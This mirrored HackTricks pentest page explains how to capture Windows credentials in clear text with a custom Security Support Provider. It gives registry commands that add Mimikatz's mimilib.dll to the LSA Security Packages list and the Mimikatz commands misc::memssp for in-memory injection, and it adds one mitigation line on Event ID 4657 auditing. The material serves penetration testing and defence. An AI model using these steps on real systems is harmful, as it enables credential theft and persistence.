Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-01-20 09:03:57 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows/active-directory-methodology/custom-ssp.md

1.4 KiB
Raw Blame History

Custom SSP

Custom SSP

Learn what is a SSP (Security Support Provider) here.
You can create you **own SSP **to capture in **clear text **the **credentials **used to access the machine.

Mimilib

You can use the mimilib.dll binary provided by Mimikatz. This will log inside a file all the credentials in clear text.
**Drop the dll in **C:\Windows\System32\
Get a list existing LSA Security Packages:

{% code title="attacker@target" %}

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
    Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

{% endcode %}

Add mimilib.dll to the Security Support Provider list (Security Packages):

PS C:\> reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

And after a reboot all credentials can be found in clear text in C:\Windows\System32\kiwissp.log

In memory

You can also inject this in memory directly using Mimikatz (notice that it could be a little bit unstable/not working):

privilege::debug
misc::memssp

This won't survive reboots.

Mitigation

Event ID 4657 - Audit creation/change of HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages